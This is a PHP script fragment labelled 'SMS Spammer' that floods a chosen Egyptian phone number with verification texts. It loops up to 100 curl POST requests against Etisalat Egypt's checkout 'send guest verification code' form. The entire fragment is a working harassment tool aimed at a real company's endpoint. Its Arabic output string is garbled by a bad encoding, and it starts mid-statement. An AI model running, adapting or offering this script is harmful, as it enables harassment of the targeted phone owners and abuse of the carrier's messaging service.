';
echo '
SMS Spammer
';
ini_set('max_execution_time', 300); //300 seconds = 5 minutes
$number = htmlspecialchars($_POST['num0']);
$add = $_POST['add'];
$kkk = 1;
$add = htmlspecialchars($_POST['add']);
$parm = preg_match("/^(010)([0-9]{8})$/", $number);
$url = "https://www.etisalat.eg/eshop/checkout/shipping.jsp?_DARGS=/checkout/shipping.jsp.sendCodeForm";
$data = array(
"_dyncharset"=>"utf-8",
"_dynSessConf"=>"342269236985937339",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestEmail"=>"",
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestEmail"=> "",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestMsisdn"=> $number,
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestMsisdn"=> "",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.sendGuestVerificationCode"=>"",
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.sendGuestVerificationCode"=> "",
"_DARGS=>/checkout/shipping.jsp.sendCodeForm"=>""
);
if(isset($_POST['sendnow'])){
if($add > 100){
echo "اخر٠100 رساÙÙ ÙعÙÙ ";
}else{
echo ' ';
while ($click <= $add ) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
$ex = curl_exec($ch);
if(!empty($ch)){
echo "Sent to: ".$number."
";
}
$click ++;
curl_close($ch);
}
}
}